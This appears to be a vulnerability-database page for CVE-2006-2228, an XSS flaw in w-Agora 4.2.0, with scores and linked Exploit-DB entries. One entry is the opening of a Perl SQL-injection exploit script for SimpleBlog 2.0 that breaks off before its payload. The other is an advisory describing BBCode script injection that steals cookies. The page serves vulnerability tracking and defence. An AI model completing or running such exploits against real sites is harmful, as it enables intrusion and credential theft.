CVE-2006-2228
published 2006-05-05CVE-2006-2228: Cross-site scripting (XSS) vulnerability in w-Agora (aka Web-Agora) 4.2.0 allows remote attackers to inject arbitrary web script or HTML via a post with a…
PriorityP418medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
2.06%
79.0th percentile
Cross-site scripting (XSS) vulnerability in w-Agora (aka Web-Agora) 4.2.0 allows remote attackers to inject arbitrary web script or HTML via a post with a BBCode tag that contains a JavaScript event name followed by whitespace before the '=' (equals) character, which bypasses a restrictive regular expression that attempts to remove onmouseover and other events.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| w-agora | w-agora | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
SimpleBlog 2.0 - 'comments.asp' SQL Injection (2)
exploitdb·2006-08-20
CVE-2006-4300 SimpleBlog 2.0 - 'comments.asp' SQL Injection (2)
SimpleBlog 2.0 - 'comments.asp' SQL Injection (2)
---
#!/usr/bin/perl
#Method found by Chironex Fleckeri
#Exploit By ASIANEAGLE
#Contact:[email protected]
#Original advisory: http://www.milw0rm.com/exploits/2228
#Usage: exploitname.pl
use IO::Socket;
if(@ARGV != 3) { usage(); }
else { exploit(); }
sub header()
{
print " *****SimpleBlog 2.0 SQL Injection Exploit***** \r\n";
print " *****www.asianeagle.org***** \r\n";
}
sub usage()
{
header();
print " *Usage: $0 \r\n";
print " * = Victim's host ex: www.site.com\r\n";
print " * = SimpleBlog Path ex: /SimpleBlog/\r\n";
print " * = Admin ID ex: 1\r\n";
exit();
}
sub exploit ()
{
$simserver = $ARGV[0];
$simserver =~ s/(http:\/\/)//eg;
$simhost = "http://".$simserver;
$simdir = $ARGV[1];
$simport = "80";
$simtar = "comments.asp?id=";
$simsql
Exploit-DB
W-Agora 4.2 - BBCode Script Injection
exploitdb·2006-04-29
CVE-2006-2228 W-Agora 4.2 - BBCode Script Injection
W-Agora 4.2 - BBCode Script Injection
---
source: https://www.securityfocus.com/bid/17751/info
W-Agora is prone to a script-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before including it in dynamically generated content.
W-Agora can be configured to send all user information in session data; if this is the case, then attacker-supplied HTML and script code would be able to access properties of the site, potentially allowing an attacker to steal cookie-based authentication credentials. Other attacks are also possible.
This issue is reported to affect version 4.20; other versions may also be vulnerable.
[code]hi[/code]
No writeups or analysis indexed.
2006-05-05
Published